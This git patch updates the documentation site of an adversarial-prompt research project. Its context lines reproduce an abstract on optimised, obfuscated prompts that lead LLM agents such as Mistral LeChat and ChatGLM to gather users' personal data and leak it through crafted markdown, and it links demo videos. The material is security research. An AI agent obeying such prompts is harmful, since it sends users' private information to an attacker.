From edd1bb184dfca06d9ef1b363f7420ca513e0e49d Mon Sep 17 00:00:00 2001
From: Xiaohan Fu
Date: Wed, 16 Oct 2024 23:38:59 -0700
Subject: [PATCH] update
---
.github/workflows/ci.yml | 2 --
docs/CNAME | 1 +
docs/index.md | 8 ++++----
docs/overrides/main.html | 4 ++--
4 files changed, 7 insertions(+), 8 deletions(-)
create mode 100644 docs/CNAME
diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml
index e1131cb..2291833 100644
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -13,8 +13,6 @@ jobs:
- uses: actions/checkout@v4
- name: Configure Git Credentials
run: |
- touch CNAME
- echo 'imprompter.ai' > CNAME
git config user.name github-actions[bot]
git config user.email 41898282+github-actions[bot]@users.noreply.github.com
- uses: actions/setup-python@v5
diff --git a/docs/CNAME b/docs/CNAME
new file mode 100644
index 0000000..6be123d
--- /dev/null
+++ b/docs/CNAME
@@ -0,0 +1 @@
+imprompter.ai
\ No newline at end of file
diff --git a/docs/index.md b/docs/index.md
index baa83f5..52aa8b0 100644
--- a/docs/index.md
+++ b/docs/index.md
@@ -9,19 +9,19 @@ hide:
Large Language Model (LLM) Agents are an emerging computing paradigm that blends generative machine learning with tools such as code interpreters, web browsing, email, and more generally, external resources. These agent-based systems represent an emerging shift in personal computing. We contribute to the security foundations of agent-based systems and surface a new class of automatically computed obfuscated adversarial prompt attacks that violate the confidentiality and integrity of user resources connected to an LLM agent. We show how prompt optimization techniques can find such prompts automatically given the weights of a model. We demonstrate that such attacks transfer to production-level agents. For example, we show an information exfiltration attack on Mistral's LeChat agent that analyzes a user's conversation, picks out personally identifiable information, and formats it into a valid markdown command that results in leaking that data to the attacker's server. This attack shows a nearly 80% success rate in an end-to-end evaluation. We conduct a range of experiments to characterize the efficacy of these attacks and find that they reliably work on emerging agent-based systems like Mistral's LeChat, ChatGLM, and Meta's Llama. These attacks are multimodal, and we show variants in the text-only and image domains.
-We present various demos and textual adversarial prompts on this page. For full details, please refer to our paper.
+We present various demos and textual adversarial prompts on this page. For full details, please refer to our [paper](./paper.pdf){target="_blank"}.
## Video Demo on Real Products
-### [Mistral LeChat](https://chat.mistral.ai/chat) (Nemo) Scenario 1
+### [Mistral LeChat](https://chat.mistral.ai/chat){target="_blank"} (Nemo) Scenario 1
![type:video](./mistral_pii_demo.mp4)
-### [Mistral LeChat](https://chat.mistral.ai/chat) (Nemo) Scenario 2
+### [Mistral LeChat](https://chat.mistral.ai/chat){target="_blank"} (Nemo) Scenario 2
![type:video](./mistral_pii_demo_2.mp4)
-### [ChatGLM](https://chatglm.cn/main/alltoolsdetail?lang=en) Scenario 1
+### [ChatGLM](https://chatglm.cn/main/alltoolsdetail?lang=en){target="_blank"} Scenario 1
![type:video](./chatglm_pii_demo.mp4)
diff --git a/docs/overrides/main.html b/docs/overrides/main.html
index 32acdbc..fbefd53 100644
--- a/docs/overrides/main.html
+++ b/docs/overrides/main.html
@@ -21,13 +21,13 @@